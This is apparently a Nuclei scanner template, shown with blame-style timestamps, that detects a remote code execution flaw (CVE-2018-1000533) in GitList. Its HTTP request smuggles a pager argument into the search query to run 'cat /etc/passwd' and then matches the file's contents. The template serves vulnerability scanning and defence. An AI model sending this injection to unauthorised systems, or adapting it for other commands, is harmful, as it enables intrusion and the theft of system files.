2021-06-15 07:28:10 +00:00
id : CVE-2018-1000533
info :
2022-04-11 14:42:35 +00:00
name : GitList < 0.6.0 Remote Code Execution
2021-06-15 07:28:10 +00:00
author : pikpikcu
severity : critical
2022-04-22 10:38:41 +00:00
description : klaussilveira GitList version <= 0.6 contains a passing incorrectly sanitized input via the `searchTree` function that can result in remote code execution.
2023-09-27 15:51:13 +00:00
impact : |
Successful exploitation of this vulnerability allows an attacker to execute arbitrary code on the target system.
2023-09-06 12:57:14 +00:00
remediation : |
Upgrade GitList to version 0.6.0 or later to mitigate this vulnerability.
2022-04-11 14:42:35 +00:00
reference :
- https://github.com/vulhub/vulhub/tree/master/gitlist/CVE-2018-1000533
- https://nvd.nist.gov/vuln/detail/CVE-2018-1000533
2022-05-17 09:18:12 +00:00
- https://security.szurek.pl/exploit-bypass-php-escapeshellarg-escapeshellcmd.html
- https://github.com/klaussilveira/gitlist/commit/87b8c26b023c3fc37f0796b14bb13710f397b322
2024-01-29 17:11:14 +00:00
- https://github.com/superlink996/chunqiuyunjingbachang
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
2022-04-22 10:38:41 +00:00
cvss-score : 9.8
2021-09-10 11:26:40 +00:00
cve-id : CVE-2018-1000533
cwe-id : CWE-20
2023-11-18 12:52:17 +00:00
epss-score : 0.97242
2024-03-23 09:28:19 +00:00
epss-percentile : 0.99831
2023-09-06 12:57:14 +00:00
cpe : cpe:2.3:a:gitlist:gitlist:*:*:*:*:*:*:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 2
2023-07-11 19:49:27 +00:00
vendor : gitlist
product : gitlist
2024-01-14 09:21:50 +00:00
tags : cve,cve2018,git,gitlist,vulhub,rce
2021-06-15 07:28:10 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-06-15 07:28:10 +00:00
- raw :
- |
GET / HTTP/1.1
Host : {{Hostname}}
- |
POST /{{path}}/tree/a/search HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
query=--open-files-in-pager=cat%20/etc/passwd
2023-07-11 19:49:27 +00:00
matchers :
- type : word
part : body
words :
- "root:/root:/bin/bash"
2021-06-15 07:28:10 +00:00
extractors :
- type : regex
name : path
group : 1
regex :
- '<span class="name">(.*?)</span>'
2023-07-11 19:49:27 +00:00
internal : true
2021-06-15 11:08:28 +00:00
part : body
2024-01-30 06:46:18 +00:00
# digest: 4b0a00483046022100bf324882241a17222b08e1456e38110610b465da49cd33db8337c6e36d8030fa0221009a39a5b06199ff2d5df9359d9fd7d5823a7f4406e822f08c53bc5567a3229a27:922c64590222798bb761d5b6d8e72950